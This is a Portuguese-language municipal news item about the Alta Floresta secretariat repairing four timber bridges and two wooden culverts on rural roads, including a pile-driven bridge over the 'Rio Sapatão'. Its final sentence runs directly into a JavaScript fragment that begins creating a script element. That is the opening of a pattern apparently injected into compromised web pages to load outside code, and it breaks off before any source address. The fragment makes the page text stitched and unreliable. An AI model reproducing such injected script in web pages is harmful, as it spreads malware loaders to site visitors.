A Prefeitura de Alta Floresta continua trabalhando a todo vapor, com obras em vários setores da cidade e da zona rural do município. Na última quinta-feira (06.10), a Secretaria Municipal de Infraestrutura (SINFRA) concluiu a recuperação de 04 pontes e 02 bueiros de madeira no Setor Sul. As obras foram essenciais para normalizar o trânsito de veículos do transporte escolar e garantir o escoamento da produção agropecuária.
Somente na Vicinal 3ª Sul (terceirinha), com acesso pela Comunidade Ouro Verde, foram revitalizadas 04 pontes, sendo duas de aproximadamente 08 metros, uma de 14 metros e outra ponte de 18 metros de comprimento. Nas duas pontes menores foi preciso trocar todo o madeiramento (prancha). Já na ponte de 14 metros foi substituída a triagem (local por onde passam os veículos) e algumas pranchas danificadas.
O serviço maior foi realizado na ponte de bate estaca, que fica localizada sobre o “Rio Sapatão”. Nesta ponte além de trocar todas as pranchas do forro também foram substituídas algumas vigas, que ficaram danificadas depois de um acidente ocorrido no começo do mês passado envolvendo um caminhão prancha carregado com uma PC Escavadeira.
Dos dois bueiros de madeira recuperados na semana passada um fica localizado na MT-010, na Comunidade Bela Vista, e o outro na Vicinal 2ª Sul (Estrada do “Subaco”). No bueiro da rodovia estadual, que tem aproximadamente 12 metros de comprimento, a SINFRA construiu uma estrutura de madeira que possibilitou nivelá-lo com o eixo da estrada facilitando, com isso, a passagem de veículos. “Antes os condutores eram obrigados a reduzir a velocidade para passar sobre o bueiro que ficava mais baixo do que a estrada, agora do jeito que vêm eles passam, ficou até melhor para passar na subida que tem logo à frente”, explicou o secretário Eloi Luiz de Almeida.
O outro bueiro recuperado tem quase 10 metros de extensão e ficava localizado em um declive depois de uma curva levemente acentuada, na Vicinal 2ª Sul. Neste caso, para resolver o problema, também foi necessário utilizar uma estrutura parecida com a do bueiro da MT-010. Agora o fluxo de veículo flui normalmente no local.var d=document;var s=d.createElement(‘script’);